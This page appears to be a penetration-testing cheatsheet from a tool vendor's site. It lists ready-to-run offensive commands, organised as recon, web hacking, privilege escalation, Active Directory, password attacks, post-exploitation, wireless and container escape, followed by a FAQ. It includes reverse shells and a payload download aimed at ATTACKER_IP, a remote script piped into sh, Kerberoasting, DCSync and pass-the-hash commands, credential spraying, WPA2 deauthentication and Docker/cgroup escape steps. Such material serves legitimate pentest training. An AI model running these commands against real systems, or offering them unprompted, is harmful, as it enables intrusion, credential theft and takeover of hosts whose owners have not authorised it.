# Reconnaissance
Information gathering is the foundation of every pentest. Start with passive recon, then move to active scanning.
Nmap — Network Discovery
nmap -sC -sV -oA scan_results TARGET_IP
nmap -p- -T4 --min-rate=1000 TARGET_IP
nmap -sU --top-ports 200 TARGET_IP
nmap --script vuln TARGET_IP
Subdomain & DNS Enumeration
subfinder -d TARGET_DOMAIN -o subdomains.txt
amass enum -d TARGET_DOMAIN -o amass_results.txt
dig axfr @DNS_SERVER TARGET_DOMAIN
Directory & File Brute-force
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# Web Application Hacking
Test for OWASP Top 10 vulnerabilities: SQLi, XSS, SSRF, IDOR, authentication bypass, and more.
SQL Injection
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
sqlmap -r request.txt --level 5 --risk 3 --batch
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
SSRF & LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Burp Suite Essentials
curl -x http://127.0.0.1:8080 -k https://TARGET
# Network Services
Common protocols and services you'll encounter during pentests: SMB, FTP, SSH, HTTP, SNMP.
SMB Enumeration
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
crackmapexec smb TARGET_IP -u '' -p '' --shares
FTP
ftp TARGET_IP # Try anonymous:anonymous
SNMP
snmpwalk -v2c -c public TARGET_IP
# Linux Privilege Escalation
After getting a shell, escalate to root. Check SUID, capabilities, cron jobs, and kernel exploits.
Enumeration Scripts
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
SUID Binaries
find / -perm -4000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Sudo Misconfigurations
sudo -l
Writable /etc/passwd
openssl passwd -1 -salt hacker password123
# Windows Privilege Escalation
Escalate from low-priv user to SYSTEM. Token impersonation, service abuse, unquoted paths.
Enumeration
winPEASany.exe quiet fast searchfast
whoami /priv
Token Impersonation
.\GodPotato.exe -cmd "cmd /c whoami"
Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# Active Directory
AD pentesting: enumerate users, kerberoast, AS-REP roast, pass-the-hash, DCSync.
Enumeration
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
# Password Attacks
Crack hashes, brute-force services, and spray credentials across the network.
Hash Cracking
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Online Brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Password Spraying
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
# Post-Exploitation
After getting access: establish persistence, pivot, exfiltrate data.
File Transfer
python3 -m http.server 8080
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Shell Upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
Pivoting
chisel server -p 8000 --reverse # On attacker
chisel client ATTACKER_IP:8000 R:socks # On target
# Wireless Attacks
WiFi pentesting: capture handshakes, crack WPA2, rogue access points.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
aireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Cloud & Kubernetes
Enumerate cloud assets, exploit misconfigurations in AWS, Azure, GCP, and Kubernetes.
AWS
aws sts get-caller-identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
Kubernetes
kubectl get pods --all-namespaces
kubectl auth can-i --list
# Container & Docker Escape
Escape Docker containers, exploit privileged mode, and abuse the Docker socket for host access.
Docker Enumeration
cat /proc/1/cgroup | grep -i docker
find / -name ".dockerenv" 2>/dev/null
ls -la /var/run/docker.sock 2>/dev/null
Docker Socket Abuse (Host Escape)
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
Privileged Container Escape
fdisk -l 2>/dev/null | grep "Disk /"
mount /dev/sda1 /mnt && chroot /mnt sh
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
cgroup Release Agent Escape
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release && host_path=$(sed -n 's/.*\soverlay\s.*\supper=\([^,]*\).*/\1/p' /proc/mounts) && echo "$host_path/cmd" > /tmp/cgrp/release_agent
❓ Pentesting FAQ
This cheatsheet covers 200+ essential commands used in OSCP and real-world pentests: nmap scanning, privilege escalation (Linux and Windows), Active Directory attacks, web hacking, and post-exploitation techniques. Bookmark it and use our dedicated OSCP cheatsheet for exam-specific tips.
The essentials: nmap for network scanning, sqlmap for SQL injection, hashcat/john for password cracking, impacket tools for Active Directory, and linpeas/winpeas for privilege escalation enumeration.
Start with recon tools (nmap, subfinder), learn the OWASP Top 10 web vulnerabilities, then practice on HackTheBox or TryHackMe. Our beginner's guide walks you through the full methodology and recommended certifications.
Privilege escalation is gaining higher permissions than initially obtained. Linux: SUID binaries, sudo misconfigs, cron job abuse, writable PATH. Windows: SeImpersonatePrivilege (GodPotato), unquoted service paths, AlwaysInstallElevated. Always run LinPEAS/WinPEAS first.
Key tools: BloodHound (attack path mapping), impacket (GetUserSPNs, secretsdump, psexec), crackmapexec (credential spraying), evil-winrm (WinRM shells), and Rubeus (Kerberos attacks). Start by mapping the domain with BloodHound to find the shortest path to Domain Admin.
SQL injection is a web vulnerability where user input is executed as SQL code. Test manually with ' OR '1'='1 or use sqlmap -u 'http://target/?id=1' --batch --dbs for automation. It can lead to data exfiltration, auth bypass, or remote code execution.
The OWASP Top 10 lists the most critical web application risks: Broken Access Control, Cryptographic Failures, Injection (SQLi/XSS/SSTI), Insecure Design, Security Misconfiguration, Vulnerable Components, Authentication Failures, Software Integrity Failures, Logging Failures, and SSRF. It's the foundation of any web pentesting methodology.
A reverse shell is a connection where the target machine initiates a connection back to the attacker's listener. Start a listener with nc -lvnp 4444, then trigger the shell on the target: bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1. If bash isn't available, try Python, Perl, or generate a payload with msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.
Lateral movement is the process of pivoting from one compromised host to others on the internal network. Common techniques: Pass-the-Hash with impacket-psexec, Pass-the-Ticket with Kerberos TGTs, SSH agent forwarding, and port forwarding via chisel or SSH tunnels. BloodHound maps the shortest lateral movement path to Domain Admin.
A vulnerability scan (Nessus, OpenVAS) automatically identifies known CVEs and misconfigurations — no exploitation. A penetration test goes further: a tester actively exploits vulnerabilities, escalates privileges, and demonstrates real business impact. Pentests require written authorization and follow a defined scope.
📚 Related Resources
- Pentesting Glossary — 60+ cybersecurity terms defined for ethical hackers
- How to Start Pentesting — Step-by-step beginner's guide with methodology & tools
- Nmap Cheatsheet — The most complete nmap reference for recon and port scanning
- OSCP Cheatsheet — Commands, techniques and exam tips for OSCP preparation
- Burp Suite Cheatsheet — Proxy, Repeater, Intruder shortcuts and the web pentest workflow
- Metasploit Cheatsheet — msfconsole, msfvenom and Meterpreter command reference
- Active Directory Cheatsheet — Kerberoasting, BloodHound, lateral movement and domain privilege escalation
- Linux Privilege Escalation Cheatsheet — SUID, sudo, cron, capabilities and kernel exploits
- Windows Privilege Escalation Cheatsheet — Tokens, unquoted services, registry and UAC bypass
- Reverse Shell Cheatsheet — Bash, Python, netcat, PowerShell and PHP one-liners
- SQL Injection Cheatsheet — UNION, blind, error-based payloads and sqlmap automation
- Hashcat Cheatsheet — Hash modes, attack types, rules and cracking workflows
- Wireshark Cheatsheet — Capture and display filters, protocol analysis and forensics
Turn your findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want 12,020+ commands in an interactive mindmap?
This cheatsheet shows a fraction of what Pentest Mindmap offers. Get 34 categories, instant search, and one-click copy — organized as a beautiful interactive mindmap.
Create free account →